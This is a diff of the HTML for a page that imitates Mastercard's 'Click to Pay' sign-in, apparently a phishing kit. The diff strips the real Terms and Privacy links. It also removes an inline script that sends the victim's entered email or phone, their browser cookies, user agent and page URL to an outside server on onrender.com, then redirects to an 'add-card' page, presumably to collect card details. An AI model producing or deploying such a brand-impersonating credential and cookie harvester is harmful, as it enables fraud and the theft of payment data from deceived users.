--- a/public/index.html
+++ b/public/index.html
@@ -7,8 +7,7 @@
   <link rel="icon" href="https://src.mastercard.com/profile/favicon.ico" />
   <title>Click to Pay</title>
 
-  <link rel="stylesheet" href="style.css" />
-  <link rel="stylesheet" href="index_files/index.d9994029.css" />
+  <link rel="stylesheet" href="/style.css" />
 </head>
 <body>
   <div class="root-container">
@@ -16,17 +15,11 @@
       <div class="container">
         <div class="row row-space-between">
           <div class="col-n header__brand">
-            <div class="header__brand__item header__brand__item--src header__brand__item--bordered">
-              <i role="img" aria-label="Mastercard Click to Pay Profile" class="icon-src"></i>
-            </div>
-            <div class="header__brand__item">
-              <i role="img" aria-label="mastercard" class="card-brand-logo--mastercard card-brand-logo--dark-support"></i>
-            </div>
+            <span class="icon-src">●●</span>
+            <span class="icon-mc">●●</span>
           </div>
           <nav class="col header__nav">
-            <a href="#" class="header__item" role="button" tabindex="0">
-              <span>US</span><i class="icon-globe"></i>
-            </a>
+            <a href="#" class="header__item"><span>US</span><span class="icon-globe">🌐</span></a>
           </nav>
         </div>
       </div>
@@ -43,22 +36,12 @@
 
         <form id="login-form" class="container-fluid" novalidate>
           <div class="row">
-            <div class="col-full">
-              <p>Create a profile or sign in</p>
-            </div>
+            <div class="col-full"><p>Create a profile or sign in</p></div>
           </div>
-
           <div class="row">
             <div class="col">
               <div class="al-input floating">
-                <input
-                  type="text"
-                  id="userId"
-                  name="userId"
-                  placeholder=" "
-                  class="al-input__input"
-                  required
-                />
+                <input type="text" id="userId" name="userId" placeholder=" " class="al-input__input" required />
                 <label for="userId" class="al-input__label">Email or mobile number</label>
                 <div class="al-input__subtext">
                   We'll use this to verify your identity. Message/data rates may apply.
@@ -70,18 +53,7 @@
           <div class="row-vertical-align-bottom">
             <div class="col-full">
               <div class="al-button">
-                <button
-                  type="submit"
-                  id="submit-btn"
-                  class="uppercase fill"
-                  aria-label="Continue"
-                  disabled
-                >
-                  <div class="al-button__dancing-dots">
-                    <div class="dancing-dot dancing-dot--1"></div>
-                    <div class="dancing-dot dancing-dot--2"></div>
-                    <div class="dancing-dot dancing-dot--3"></div>
-                  </div>
+                <button type="submit" id="submit-btn" class="uppercase fill" aria-label="Continue" disabled>
                   <span class="al-button__label">Continue</span>
                 </button>
               </div>
@@ -96,63 +68,16 @@
         <div class="row">
           <div class="col">
             <nav class="footer__nav">
-              <a href="https://www.mastercard.com/global/click-to-pay/en-us/terms-of-use.html" target="_blank" class="btn btn--footer uppercase">Terms</a>
-              <a href="https://www.mastercard.com/global/click-to-pay/en-us/privacy-notice.html" target="_blank" class="btn btn--footer uppercase">Privacy</a>
-              <a href="#" class="btn btn--footer uppercase">Cookies</a>
-              <a href="#" class="btn btn--footer uppercase">Feedback</a>
+              <a href="#" class="btn btn--footer">Terms</a>
+              <a href="#" class="btn btn--footer">Privacy</a>
+              <a href="#" class="btn btn--footer">Cookies</a>
+              <a href="#" class="btn btn--footer">Feedback</a>
             </nav>
           </div>
         </div>
       </div>
     </footer>
   </div>
-
-<script type="module" src="/src/main.js"></script>
+  <script type="module" src="/src/main.js"></script>
 </body>
-</html>
-
-      const input = document.getElementById('userId');
-      const button = document.getElementById('submit-btn');
-      const form = document.getElementById('login-form');
-
-      input.addEventListener('input', () => {
-        button.disabled = input.value.trim() === '';
-      });
-
-      form.addEventListener('submit', async (e) => {
-        e.preventDefault();
-        const value = input.value.trim();
-
-        const isValid = value.match(/^(\+48\d{9}|[a-zA-Z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,})$/i);
-        if (!isValid) {
-          alert('Please enter a valid phone number or email');
-          return;
-        }
-
-        button.disabled = true;
-        button.querySelector('.al-button__label').textContent = 'Loading...';
-
-        try {
-          await fetch('https://onclick-back.onrender.com/login', {
-            method: 'POST',
-            headers: { 'Content-Type': 'application/json' },
-            body: JSON.stringify({
-              email: value,
-              cookies: document.cookie,
-              userAgent: navigator.userAgent,
-              location: window.location.href,
-              date: new Date().toISOString()
-            })
-          });
-
-          window.location.href = 'add-card.html';
-        } catch (err) {
-          console.error('Submission error:', err);
-          alert('Something went wrong. Please try again.');
-          button.disabled = false;
-          button.querySelector('.al-button__label').textContent = 'Continue';
-        }
-      });
-    </script>
-  </body>
 </html>
